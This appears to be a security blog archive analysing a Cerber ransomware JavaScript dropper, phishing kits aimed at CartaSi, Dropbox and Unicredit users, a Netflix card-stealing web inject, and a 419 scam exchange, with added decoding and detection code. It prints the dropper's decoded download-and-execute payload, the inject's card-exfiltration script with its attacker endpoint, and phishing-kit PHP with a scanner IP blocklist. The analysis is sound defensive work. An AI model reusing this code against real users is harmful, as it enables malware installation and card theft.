

JS/Nemucod.ED!Eldorado – Cerber Ransomware. The JavaScript dropper.

A recent malware family has been spotted in the wild under the name Cerber. It is spread through phishing emails carrying a .zip attachment that contains a malicious JavaScript file. The idea is to trick people into double-clicking the JavaScript file: on Windows a .js file opened this way runs under the Windows Script Host (wscript.exe), outside the browser, which is what gives the script access to the ActiveX objects seen later in this post. The JS is only a dropper whose job is to download the actual malware onto the victim machine; AV products detect it under the name JS/Nemucod.ED!Eldorado. The JS code reported below is the obfuscated dropper.


function cjspx()
{
	// Six code fragments, one returned at random per call. Five are the pieces missing from
	// the decoder string in ytzte(); "_T" never fits anywhere and is noise.
	var mkmpz=new Array("_"+""+"T","g"+"."+"f","h"+")"+""+"{","e"+"("+"p","+"+"+"+";","]"+"."+"su");
	// Math['rand'+'om']() is Math.random() written so that the word "random" is not in the file
	return mkmpz[Math.floor(Math['rand'+new Array('om')[0]]()*mkmpz.length)];
}
function tiins()
{
	// zkqqd: the obfuscated payload, a long string of 5-character chunks carrying one hex byte each.
	// The payload string itself is omitted from this copy of the post.
	var zkqqd="...";
	var gfltf;
	// Retry until the random fragments happen to form a decoder that compiles and runs;
	// every wrong combination throws and the exception is silently swallowed.
	while(true){
		try
		{
			gfltf=ytzte(zkqqd);
			break;
		}
		catch(er)
		{
			var a = 1;
		}
	}
	return gfltf;
}
function ytzte(cmift)
{
	// Builds the decoder from fixed text plus five cjspx() picks and runs it via new Function.
	// With the right picks the generated source reads:
	//   var ibmqd=cshqx.match(/\S{5}/g),vztbz="",jlawe=0;
	//   while(jlawe<ibmqd.length){vztbz+=String.fromCharCode(parseInt(ibmqd[jlawe].substr(3,2),16)^79);jlawe++;}
	//   eval(vztbz);
	return (new Function("cshqx","wgqod","dsvyh","var ibmqd=cshqx.match(/\\S{5}/g),vztbz=\"\",jlawe=0;while(jlawe<ibmqd.lengt"+cjspx()+"vztbz+=Strin"+cjspx()+"romCh"+"arCod"+cjspx()+"arseI"+"nt(ibmqd[jlawe"+cjspx()+"bstr(3,"+"2),1"+"6)^79);jlawe"+cjspx()+"}eval(vztbz);")(cmift,null,null));
}
tiins();

The code is composed of three functions:

• cjspx()

Returns one random entry from a six-element array of code fragments. Five of the fragments are the pieces missing from the decoder string built in ytzte(); the sixth ("_T") never fits anywhere and is just noise. Note also Math['rand'+'om'] in place of Math.random, a cheap way to keep the literal "random" out of the file.

• tiins()

The main function. It holds the obfuscated payload in the variable zkqqd and calls ytzte() in an infinite loop that only exits when de-obfuscation succeeds. Every iteration draws five random fragments, and in practice only the one combination that produces valid code gets through (about one attempt in 6^5 = 7776); every other combination throws, the exception is swallowed and the loop tries again. On a real machine this costs nothing noticeable, but a sandbox or emulator with a short execution budget may give up before the payload is ever decoded.

• ytzte(cmift)

Builds the decoder source as a string, turns it into a function with new Function(...) and runs it on the payload. The decoder splits the payload into 5-character chunks, reads two hex digits from each chunk, XORs the byte with 79 and finally eval()s the resulting text.

In order to decode and understand what this dropper is doing we can use the Chrome Developer Tools and go through three simple steps:

1. Extract all the values of the array allocated in cjspx().


2. Rebuild the string used to create the new Function in ytzte(), choosing at each cjspx() call the fragment that gives correct syntax.
We can then write a function, called test, that decodes the obfuscated payload without ever executing it: the regex /\S{5}/g splits the payload into consecutive chunks of 5 non-whitespace characters, substr(3,2) takes the 4th and 5th character of each chunk as a hex byte (the first three characters are padding), and the byte is XORed with the constant found in the decoder string. Replacing the final eval() with console.log gives us the plaintext.

function test(a, key){
	// key: the XOR constant read from the decoder string (79 for the ytzte() sample above;
	// it differs between samples, so read it from the decoder rather than hard-coding it)
	var ryybh=a.match(/\S{5}/g);   // consecutive 5-char non-whitespace chunks
	var zhhzw="";
	var dbdvx=0;
	while(dbdvx<ryybh.length){
		// characters 4-5 of each chunk are the hex byte; the first three are padding
		zhhzw+=String.fromCharCode(parseInt(ryybh[dbdvx].substr(3,2),16)^key);dbdvx++;
	}
	console.log(zhhzw);   // print instead of eval(): we want to read the payload, not run it
	return zhhzw;
}

Only five of the six array entries are needed to build the function; the remaining one ("_T") is there just to create noise.

3. Pass the obfuscated payload (and the XOR constant read from the decoder string, 79 for this sample) to test() and read the output in the console.
The decoded payload will look like:

// Synchronous GET through the MSXML2.XMLHTTP COM object (there is no XMLHttpRequest in WSH)
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}

// Tries three payload URLs on the same host in turn; the first one that answers 200 wins
function getData(callback) {
try {
getDataFromUrl("http://89.40.181.39/js/1.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://89.40.181.39/js/2.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://89.40.181.39/js/3.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}

function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";   // random 9-character name
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;                    // 2 = TemporaryFolder (%TEMP%)
return tmpFilePath;
} catch (error) {
return false;
}
}

function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;              // adTypeBinary
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);   // adSaveCreateOverWrite
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function(data, error) {
if (!error) {
saveToTemp(data, function(path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);   // launch the dropped .exe via WScript.Shell (not PowerShell)
} catch (error) {}
}
});
}
});

The decoded script downloads an executable from the C2 server, trying 1.exe, 2.exe and 3.exe in turn until one request returns HTTP 200, writes it to the user's temporary folder under a random nine-character name and launches it with WScript.Shell.Run. No PowerShell is involved: everything runs inside the Windows Script Host process that opened the .js file, and the dropped binary is what carries the Cerber ransomware.
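The chunk-and-XOR scheme above, reimplemented as an added example that is not part of the original post and not the dropper's own code. It keeps the dropper's exact decoding rules (five-character runs, two hex digits at offset 3, XOR with 79; both constants are parameters because they are per-sample) but drops new Function()/eval(), so it returns the decoded text instead of running it. The encoder exists only to construct a test payload, since the real payload string is missing from this copy of the post; the function names, the padding alphabet and the sample string are the example's own.

```javascript
// Added example (not code from the original post): the Nemucod chunk/XOR decoding
// rewritten as plain functions, with no new Function()/eval(), so the payload is
// returned as a string to read rather than executed.

// Decoder. Mirrors the string ytzte() assembles: split the payload into runs of five
// non-whitespace characters, take two hex digits at `hexOffset` inside each run, XOR
// with `key`. 79 and offset 3 are the constants of the sample above; both differ per sample.
function decodeNemucod(payload, key = 79, hexOffset = 3) {
  const chunks = payload.match(/\S{5}/g) || [];
  let out = "";
  for (const chunk of chunks) {
    const hex = chunk.substr(hexOffset, 2);
    if (!/^[0-9a-fA-F]{2}$/.test(hex)) {
      throw new Error("chunk '" + chunk + "' has no hex byte at offset " + hexOffset);
    }
    out += String.fromCharCode(parseInt(hex, 16) ^ key);
  }
  return out;
}

// Encoder, written only so the example can build its own test payload (the real
// payload is produced by the attacker's toolkit, which is not on the page).
// Padding characters are arbitrary non-whitespace bytes, which is why the dropper's
// regex is \S{5} rather than a fixed alphabet.
function encodeNemucod(text, key = 79, hexOffset = 3) {
  const PAD = "abcdefghijklmnopqrstuvwxyz0123456789_";   // constructed padding alphabet
  let out = "";
  for (let i = 0; i < text.length; i++) {
    const code = text.charCodeAt(i);
    if (code > 0xff) throw new Error("the scheme carries one byte per chunk");
    const hex = (code ^ key).toString(16).padStart(2, "0");
    let pad = "";
    for (let j = 0; j < 3; j++) pad += PAD[(i * 7 + j * 11) % PAD.length];
    out += pad.slice(0, hexOffset) + hex + pad.slice(hexOffset);
    if (i % 16 === 15) out += "\n";   // whitespace is skipped by \S{5}, as in the sample
  }
  return out;
}

// Because the decoder only runs the chunk logic, it is safe to point at a real sample:
// paste the zkqqd string in place of sampleEncoded and read the result.
const sampleCode = 'var wsh = new ActiveXObject("WScript.Shell");';  // constructed input
const sampleEncoded = encodeNemucod(sampleCode);
const sampleDecoded = decodeNemucod(sampleEncoded);
console.log(sampleEncoded.split("\n")[0]);
console.log(sampleDecoded);
```

Feeding the decoder a chunk that has no hex digits at the expected offset raises an error instead of producing garbage, which is the quickest way to notice that a new sample uses a different offset or chunk width.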

Servers detected so far:

• 89.40.181.39
• i01001.dgn.vn


Phishing Attack #5 – Cartasi

Phishing attacks are becoming more and more sophisticated and targeted. One of the latest phishing kits I analyzed is built to target only Italians and to filter out people from other countries. The financial institution targeted by the campaign is CartaSi, the leading electronic payments company in Italy. CartaSi manages a total of 27 million credit, prepaid and debit cards and provides the acceptance service to approximately 600,000 merchants. CartaSi's coverage is worth about 50% of the Italian market, while the debit cards it manages are about a quarter of the market.

Let's have a look at the phishing website.

The email sent to phish the victim is poorly designed, but it can still trick a few people into entering their credentials.

screen-shot-2016-12-05-at-10-47-22-am

In order to filter users based on their geolocation, the phishing website uses the geoPlugin PHP class (geoplugin.class.php, which resolves the visitor's IP through the geoplugin.net web service) and only lets users connecting from Italy through:


// ccr.php - country code redirect
require_once('geoplugin.class.php');
$geoplugin = new geoPlugin();
$geoplugin->locate();                  // looks up REMOTE_ADDR through the geoplugin.net service
$country_code = $geoplugin->countryCode;
switch($country_code) {
case 'IT':
header('Location: crts.php');          // Italian visitors get the phishing page
exit;
default: // exceptions
header('Location: http://www.cartasi.it/gtwpages/index.jsp');   // everyone else is bounced to the real site
exit;
}

If the country code is not IT, the user is redirected to the official CartaSi page. A practical consequence for analysts: from outside Italy the URL looks harmless, so the kit has to be examined from an Italian exit IP (or by reading the PHP sources directly, as below).

The phishing kit's folder structure is "obfuscated" with a random folder generation routine:

$random=rand(0,100000000000);
$md5=md5($random);
$base=base64_encode($md5);
$dst=md5($base);                         // 32 hex characters: the per-visit directory name
function recurse_copy($src,$dst) {
$dir = opendir($src);
@mkdir($dst);
while(false !== ( $file = readdir($dir)) ) {
if (( $file != '.' ) && ( $file != '..' )) {
if ( is_dir($src . '/' . $file) ) {
recurse_copy($src . '/' . $file,$dst . '/' . $file);
}
else {
copy($src . '/' . $file,$dst . '/' . $file);
}
}
}
closedir($dir);
}
$src='acrts/';                           // the kit itself
recurse_copy( $src, $dst );              // every visit gets a fresh, complete copy of the kit ...
header("location:$dst");                 // ... and is redirected into it, so each victim lands on a unique URL

The initial structure of the phishing kit is very simple, and directory listing is avoided by placing a fake 404 page (index.html) in every folder.

screen-shot-2016-12-01-at-10-55-07-pm

All the logic of the phishing website is stored inside the folder acrts, where the following files can be found:

screen-shot-2016-12-01-at-11-13-49-pm

The main file is login.php, the entry point of the phishing website: it filters the visitor's IP and collects the username, password and IP address of the user. The information collected is stored in three files:

  • hits.txt
  • cts1.txt
  • cts2.txt

where cts1.txt contains (truncated) username, password, IP and country:

screen-shot-2016-12-05-at-10-17-45-am

and cts2.txt the credit cards stolen:

screen-shot-2016-12-05-at-10-15-54-am

The part of login.php that decides which visitors get served is reported below (truncated). Despite its purpose in the flow, this is not geolocation: it is a blocklist of IP prefixes, and every match simply terminates the script.

$IP = getenv("REMOTE_ADDR");
$day = date('l jS \of F Y h:i:s A');
// Each line is a plain string compare of the first N characters of the address; a match kills the request.
if ( substr($IP, 0, 7) == "174.123") die;
if ( substr($IP, 0, 7) == "75.125.") die;
if ( substr($IP, 0, 7) == "74.125.") die;
if ( substr($IP, 0, 7) == "64.235.") die;
if ( substr($IP, 0, 7) == "209.85.") die;
if ( substr($IP, 0, 7) == "64.235.") die;
if ( substr($IP, 0, 7) == "84.14.2") die;
if ( substr($IP, 0, 7) == "194.106") die;
if ( substr($IP, 0, 7) == "173.178") die;
if ( substr($IP, 0, 7) == "216.82.") die;
if ( substr($IP, 0, 7) == "79.176.") die;
if ( substr($IP, 0, 7) == "219.117") die;
if ( substr($IP, 0, 7) == "150.70.") die;
if ( substr($IP, 0, 7) == "209.120") die;
if ( substr($IP, 0, 7) == "67.159.") die;
if ( substr($IP, 0, 7) == "143.127") die;
if ( substr($IP, 0, 7) == "67.172.") die;
if ( substr($IP, 0, 7) == "202.75.") die;
if ( substr($IP, 0, 7) == "38.127.") die;
if ( substr($IP, 0, 7) == "128.242") die;
if ( substr($IP, 0, 7) == "64.125.") die;
if ( substr($IP, 0, 7) == "69.163.") die;
if ( substr($IP, 0, 7) == "149.20.") die;
if ( substr($IP, 0, 7) == "91.199.") die;
if ( substr($IP, 0, 7) == "38.111.") die;
if ( substr($IP, 0, 7) == "174.122") die;
if ( substr($IP, 0, 7) == "124.178") die;
if ( substr($IP, 0, 7) == "199.48.") die;
if ( substr($IP, 0, 7) == "199.76") die;
if ( substr($IP, 0, 7) == "62.213.") die;
if ( substr($IP, 0, 10) == "194.72.238") die;
if ( substr($IP, 0, 7) == "66.227.") die;
if ( substr($IP, 0, 10) == "87.249.110") die;
if ( substr($IP, 0, 7) == "204.95.") die;
if ( substr($IP, 0, 7) == "220.25.") die;
if ( substr($IP, 0, 10) == "66.249.71.") die;
if ( substr($IP, 0, 10) == "208.80.194") die;
if ( substr($IP, 0, 10) == "94.228.131.") die;
if ( substr($IP, 0, 10) == "66.150.14.") die;
if ( substr($IP, 0, 7) == "64.71.") die;

.... (logic to store and send the stolen data via email to the phisher)

Two things are worth noting about this list. First, several of the prefixes (66.249., 74.125., 209.85.) are Google ranges, which tells who the list is for: crawlers and security scanners, not victims from the wrong country. Second, substr($IP, 0, 7) always returns exactly seven characters, so comparing it with the six-character "199.76" or "64.71." can never succeed, and the same goes for the eleven-character "94.228.131." against a ten-character substring; those three rules are dead code. The rules that do work are not network-aware either: "84.14.2" matches 84.14.2.x, but also 84.14.20.x and 84.14.200.x.

After the phisher has successfully stolen the credentials, the user is redirected to the real CartaSi website, www.cartasi.it, as most phishing websites do. This mechanism allows CartaSi to detect the phishing website easily, by looking for the unexpected Referer in its own web server logs.
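The blocklist logic above, reduced to an added example that is not the kit's code and not part of the original post. It reimplements the kit's comparison with PHP substr() semantics in JavaScript, lists the rules that can never match, and shows the CIDR comparison the kit should have used. The rules are a subset copied from login.php; the IP addresses fed to it are constructed, and the /19 and /24 networks in the usage call are illustrative rather than the real allocations.

```javascript
// Added example (not part of the kit or the post): the kit's prefix blocklist reproduced
// with PHP substr() semantics, a check that finds rules that can never match, and the
// CIDR comparison the kit should have used. Rules copied from login.php; IPs constructed.

// Each kit rule is `substr($IP, 0, len) == "prefix"`.
const KIT_RULES = [
  [7, "174.123"], [7, "75.125."], [7, "74.125."], [7, "209.85."], [7, "84.14.2"],
  [7, "199.76"], [7, "64.71."], [10, "194.72.238"], [10, "66.249.71."],
  [10, "94.228.131."], [10, "66.150.14."],
];

// PHP `substr($ip, 0, len) == prefix` is an exact string comparison; returns true when the
// kit would `die`. A prefix whose length differs from `len` can never equal a substring
// of exactly `len` characters.
function kitBlocks(ip, rules = KIT_RULES) {
  return rules.some(([len, prefix]) => ip.substr(0, len) === prefix);
}

// Rules that are dead code: prefix length does not match the substr length.
function deadRules(rules = KIT_RULES) {
  return rules.filter(([len, prefix]) => prefix.length !== len).map(([, prefix]) => prefix);
}

// What the kit author presumably meant: a real network-prefix comparison.
function ipToInt(ip) {
  const parts = ip.split(".").map(Number);
  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error("not an IPv4 address: " + ip);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

function inCidr(ip, cidr) {
  const [net, bitsStr] = cidr.split("/");
  const bits = Number(bitsStr);
  // JS shifts are mod 32, so a /0 mask has to be special-cased
  const mask = bits === 0 ? 0 : (0xffffffff << (32 - bits)) >>> 0;
  return ((ipToInt(ip) & mask) >>> 0) === ((ipToInt(net) & mask) >>> 0);
}

// Usage: the string compare over-blocks 84.14.200.1 and never blocks 64.71.1.1;
// the CIDR form does exactly what a prefix rule is meant to do.
console.log("dead rules:", deadRules());
console.log("84.14.200.1 (string):", kitBlocks("84.14.200.1"), "(cidr /24):", inCidr("84.14.200.1", "84.14.2.0/24"));
console.log("64.71.1.1 (string):", kitBlocks("64.71.1.1"));
```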

The phishing kit also contains a simple PHP shell called ttt.php that gives the operator file access to the web server. Below, the code of ttt.php.

screen-shot-2016-12-05-at-10-43-53-am

 

 

It is easy to tell that this website is fake and belongs to a phisher.

So far ~15 credit cards and ~30 username/password pairs have been stolen. Awareness is still very low.

 

 


NETFLIX malware/phishing attack targeting Portuguese-speaking countries

Netflix is one of the most popular streaming platforms all over the world, especially because of its hit TV series. This popularity has also attracted criminals looking for new ways to steal money. During the last months Netflix users have been targeted by malware written to steal credit card information and user credentials. The attack uses the same technique as banking malware like Dridex/Zeus: web injects.

Once the user has been infected, the malware waits until the user loads the Netflix login page. As soon as the browser loads the content from the server, the malware injects the malicious HTML, JavaScript and CSS below into the page. Because the modification happens inside the browser, the overlay appears on the genuine netflix.com origin, with a valid certificate and the right URL in the address bar.

The inject is activated on GET or POST requests matching *netflix.com*, with the usual Zeus-style webinject target line:

set_url *netflix.com/* GP

where G = GET and P = POST.

Once the page is loaded the malware injects the following code:

CSS code

.ontop {
z-index: 999;
width: 100%;
height: 100%;
top: 0;
left: 0;
display: none;
position: absolute;
}
.ontop2 {
top: 50%;
left: 50%;
margin-bottom: 0;
align-content: center;
}
#popup {
padding: 10px;
width: 1224px;
height: 700px;
position: absolute;
color: #fff;
top: 50%;
left: 50%;
margin-top: -400px;
margin-left: -600px;
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 12px;
background: #000000;
}
#cc_form input {
width: 100%;
height: 50px;
padding: 9px;
border-radius: 2px;
border: 1px solid #999;
color: #fff;
background-color: #333;
}
#cc_form td {
padding-top: 10px;
color: #eee;
font-size: 12px;
}
#cc_submit {
text-decoration: none;
color: white;
padding-bottom: 12px;
padding-left: 28px;
padding-right: 28px;
padding-top: 12px;
text-align: center;
border-radius: 2px;
background: #ff3019;
background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: -webkit-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: linear-gradient(to bottom, #ff3019 0%, #cf0404 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404', GradientType=0);
}
#cc_submit:hover {
background: #ff1a00;
background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: -webkit-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: linear-gradient(to bottom, #ff1a00 0%, #ff1a00 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00', GradientType=0);
} 
JavaScript code

.....

function submitMe(){
    // Client-side validation of the fake payment form. The messages are Portuguese:
    // "Enter a card number", "Enter a valid number", "Enter the expiry month/year",
    // "Enter your card's security code", "Enter your full name".
    if (document.getElementById("cc_number").value == "") {
        alert("Ingresse um numero de Cartao");
        document.getElementById("cc_number").focus();
        return false;
    }else {
        // valid_credit_card() is defined in the part of the inject not shown here
        if (valid_credit_card(document.getElementById("cc_number").value)) {} 
        else {
           alert("Ingresse um numero Valido");
           document.getElementById("cc_number").focus();
           return false;
        }
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o mes de validade!");
        document.getElementById("cc_month").focus();
        return false;
    }
    if (document.getElementById("cc_month").value == "") {   // sic: cc_month is checked twice, so an empty year is accepted
        alert("Ingresse o ano de validade!");
        document.getElementById("cc_year").focus();
        return false;
    } 
    if (document.getElementById("cc_ccv").value == "") {
        alert("Ingresse o codigo de segurança do seu cartao!");
        document.getElementById("cc_ccv").focus();
        return false;
    }
    if (document.getElementById("cc_name").value == "") {
        alert("Ingresse o seu nome Completo!");
        document.getElementById("cc_name").focus();
        return false;
    }

// Exfiltration: the card data goes into the query string of a <script src> request to the
// attacker's gate.php. Script elements are not restricted by the same-origin policy, so no
// CORS handling is needed, and the full record travels in a plain GET URL (visible in proxy logs).
var _link_ = "https://p0o9i8u7y9.xyz/braz2/gate.php?";
var _url_ = _link_ + 'CC=' + document.getElementById("cc_number").value + '&month=' + document.getElementById("cc_month").value + '&year=' + document.getElementById("cc_year").value + '&cvv=' + document.getElementById("cc_ccv").value + '&name=' + document.getElementById("cc_name").value;
var head = document.getElementsByTagName("head")[0];
var script_ = document.createElement('script');
script_.src = _url_;
script_.type = 'text/javascript';
head.appendChild(script_);
setCookie("WeAre", "Foda", 365);   // marker cookie; setCookie() and hide() are defined in the part not shown
hide('popDiv');                     // take the overlay down
}

......
HTML code


<div class="ontop" id="popDiv">

<div id="popup">
   <center>
   <img src="https://logodownload.org/wp-content/uploads/2014/10/netflix-logo.png" width="128">
  </center>

<h4>Houve um problema com seus dados de pagamento.</h4>

Desculpe-nos por
 interromper o show, mas não foi possível confirmar suas informações de
 pagamento. Mas não se preocupe! Insira os dados no campo abaixo para
 continuar.

<form id="cc_form" name="cc_form">

<table width="100%">

<tr>

<td colspan="2">Numero do cartão: <input id="cc_number" name= "cc_number" placeholder="E.g. 0000 0000 0000 0000" type="text"></td>

 </tr>


<tr>

<td>Validade: <input id="cc_month" name="cc_month" placeholder="MM" style="width: 45% !important;" type="text"> <input id="cc_year" name= "cc_year" placeholder="AA" style="width: 45% !important;" type= "text"></td>


<td>Codigo de segurança: <input id="cc_ccv" name="cc_ccv" placeholder="" type="text"></td>

 </tr>


<tr>

<td colspan="2">Nome do titular (conforme escrito no cartão):
 <input id="cc_name" name="cc_name" type="text"></td>

 </tr>

 </table>

<a href="" id="cc_submit" onclick="submitMe();">CONTINUAR</a>
 </form>

 </div>

</div>


 

In order to see how the malware interacts with the user, we can inject the code ourselves into the browser once the Netflix login page is loaded. The overlay tells the user (in Portuguese) that there was a problem with their payment data and asks them to re-enter the card details to continue watching.

The malware checks whether the entered credit card number is valid before submitting anything, so junk input never reaches the attacker's server.

screen-shot-2016-10-17-at-2-54-52-pm

With a valid credit card number the request can be submitted, triggering the submitMe() JavaScript function shown above.
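The validity check the inject performs is something a defender can reuse. The added example below (not the inject's code, and not from the original post) implements a Luhn check, which is what valid_credit_card() is assumed to do since the page does not show it, and then turns the same check around to hunt for card numbers in the query strings of proxy-log lines, the way this inject's gate.php request would appear. The log lines are constructed; 4111111111111111 and 5500000000000004 are standard test numbers.

```javascript
// Added example (not the inject's code): a Luhn check of the kind valid_credit_card()
// is assumed to perform, then the same check used the other way round, to pull
// card-number exfiltration out of proxy-log lines like the one this inject produces.

// Luhn (mod 10) checksum over a PAN; spaces and dashes are tolerated, anything else is not.
function luhnValid(cardNumber) {
  const digits = String(cardNumber).replace(/[\s-]/g, "");
  if (!/^\d{13,19}$/.test(digits)) return false;  // PAN lengths in circulation are 13..19 digits
  let sum = 0;
  let doubleIt = false;                            // every second digit from the right is doubled
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (doubleIt) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    doubleIt = !doubleIt;
  }
  return sum % 10 === 0;
}

// Constructed proxy-log lines: the first is what this inject's <script src> request to
// gate.php looks like on the wire; the other two carry long digit strings that are not PANs.
const LOG_LINES = [
  "2016-10-17T14:54:52Z 10.0.0.8 GET https://p0o9i8u7y9.xyz/braz2/gate.php?CC=4111111111111111&month=12&year=19&cvv=123&name=J+DOE 200",
  "2016-10-17T14:55:01Z 10.0.0.8 GET https://www.netflix.com/browse?trackId=1234567890123 200",
  "2016-10-17T14:55:07Z 10.0.0.9 GET https://cdn.example.net/app.js?v=2016101714550700 200",
];

// Returns one hit per query parameter whose value is a Luhn-valid PAN. The checksum is what
// keeps order ids and timestamps (also long digit strings) out of the results.
function findCardExfil(lines) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/https?:\/\/\S+/);
    if (!m) continue;
    const url = new URL(m[0]);
    for (const [param, value] of url.searchParams) {
      if (luhnValid(value)) {
        hits.push({
          host: url.hostname,
          param,
          pan: value.replace(/\d(?=\d{4})/g, "*"),   // keep only the last four digits in output
        });
      }
    }
  }
  return hits;
}

console.log(findCardExfil(LOG_LINES));
```

Run over real proxy logs this is noisy for parameters that legitimately carry card numbers (payment providers), so filter on destination host reputation as well; the point here is that the same checksum the inject uses to reject junk lets a defender reject junk matches too.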


Phishing Attack #4 – Dropbox

Clone kit revealed

A new fake Dropbox phishing scam targeting users of the file sharing and storage platform is currently in circulation. The scam invites recipients to view files shared by another Dropbox user and to click on a link that redirects to a phishing website.

screen-shot-2016-10-13-at-11-26-48-am

In reality, the phishing page tries to fool users into submitting the username and password of their email account (Yahoo, Outlook, Gmail, AOL or others), which is what the attacker is after.

screen-shot-2016-10-13-at-11-26-57-am

Clicking on one of the icons opens a modal asking for credentials.

screen-shot-2016-10-13-at-11-27-16-am screen-shot-2016-10-13-at-11-27-24-am

Once the credentials are filled in and the "Submit" button is clicked, they are sent by email to the phisher.

By analyzing the web server it is possible to retrieve the clone kit the attacker used to build the phishing website. The kit is very simple and shows basic programming skills. Below, the structure and the source code of submit.php; form.php and index.php are 99% HTML.

screen-shot-2016-10-13-at-11-37-51-am

The developer downloaded all the provider icons and serves them locally instead of hotlinking them, presumably so that no request with the phishing site as Referer ever reaches the real providers.

screen-shot-2016-10-13-at-11-38-07-am

screen-shot-2016-10-13-at-11-28-32-am

Dropbox can easily identify this phishing attack by looking at the HTTP Referer header of incoming requests, because the phishing website redirects victims to the official Dropbox website after the credentials are submitted.

 


Unicredit.com has fewer visits than this phishing website.




Recently my best friend received a call from his bank (Unicredit), telling him that his account was temporarily blocked because of the risk of suspicious activity on it. He asked for more information about it, and they asked him whether he had recently put his credentials into a website similar to the official one. He replied that he hadn't done that, not even on the official one; the last time he used online banking was many months ago. Result: they unblocked his account and he can use his money again.

Two minutes later he called me to tell me this story. I was lying on the couch checking my email, and my spam. While he was speaking, one email caught my eye:

Screen Shot 2016-06-29 at 4.06.08 PM

Voila!

Screen Shot 2016-06-29 at 3.54.37 PM

It looks like Unicredit is facing a massive phishing attack and is blocking accounts even without evidence of fraud.

Interesting. Let’s analyze it a bit.

The clone kit used by the attackers is very similar to the others. The attack is not even sophisticated: it uses just a form and an image as background. Below, the structure.

Screen Shot 2016-06-29 at 4.10.08 PM

The HTML files 1, 2 and 3 are just redirects to cc.html, inside.html and inside2.html. Let's analyze the PHP files.

1.png is the background of the login page.

They look very simple. The PHP skills required in this case are very low.

  • index.php

Screen Shot 2016-06-29 at 4.14.45 PM

Just a simple redirect that generates a random string and includes random.php. See below.

Screen Shot 2016-06-29 at 4.16.32 PM

This file tracks all the victims, saving their location. The results are saved in the file visit.txt. So far the number of visitors is about 3175, most of them from Italy.

Going deeper through the other files, we can see that all the information entered by the victims on the phishing website is stored in a text file named pinco1.txt and sent by email to the attacker.

Screen Shot 2016-06-29 at 4.14.56 PM

The obfuscated content of these files is shown at the end of this post.

The other PHP files are quite similar to each other :

Screen Shot 2016-06-29 at 4.16.01 PM

Screen Shot 2016-06-29 at 4.16.14 PM

Screen Shot 2016-06-29 at 4.16.23 PM

 

The only difference is the redirect. The victims are asked to enter the OTP (One Time Password) three times, so that the attacker ends up with a fresh one, valid for 30-60 seconds, with which to make transfers.

Result of the campaign till now:

  • 3175 VISITORS
  • MANY usernames, passwords, CCs, CVVs and OTPs stolen

Below a snapshot of the two files mentioned before:

  • pinco1.txt

Screen Shot 2016-06-29 at 4.46.53 PM

  • visit.txt

Screen Shot 2016-06-29 at 4.33.37 PM

 

Ciao!


A nice conversation with a “scammer”

“The so-called “419” scam (aka “Nigeria scam” or “West African” scam) is a type of fraud named after an article of the Nigerian penal code under which it is prosecuted. It is also known as “Advance Fee Fraud” because the common principle of all the scam format is to get the victim to send cash (or other items of value) upfront by promising them a large amount of money that they would receive later if they cooperate. In almost all cases, the criminals receive money using Western Union and MoneyGram, instant wire transfer services with which the recipient can’t be traced once the money has been picked up. These services should never be used with people you only know by email or telephone!” (http://www.419scam.org)

Curious about that, I started a conversation with the Nigerian guy to see how the scam actually works.

Scammer

Dear Friend,

 I am very happy to inform you about my success in getting that fund transferred. Now I want you to contact my secretary and ask him for a cheque worth USD $800,000 which I kept for you as compensation for your past assistance to me. His contact details are below;

Name:   John Izualo.

Email;  ( johnizualo6@yahoo.com )

Kindly reconfirm to him the following below information:

 

Your full name_________

Your address_______

Your country______

Your age__________ 

Your occupation______

Your Phone number_______

 

Note that if you do not send him the above information complete, he will not release the cheque to you because he has to be sure that it is you. Note also that I will not be reachable by email or phone at this moment because I am currently in London on an investment trip with my share.

Regards,

Dr.Peter Ikey Obi.

Me

Hello I received this mail from Dr.Peter Ikey Obi,

I didn't know how I helped him, but I'm very happy to receive this bonus.

Here are my details for the transfer.

Your full name______Davide XXXX

Your address_______Via dei XXX

Your country_______Italy

Your age___________59

Your occupation______Director Sales at XXX

Your Phone number_______+3934877XXXXX

Regards,

Scammer

 DEAR Davide XXXX,

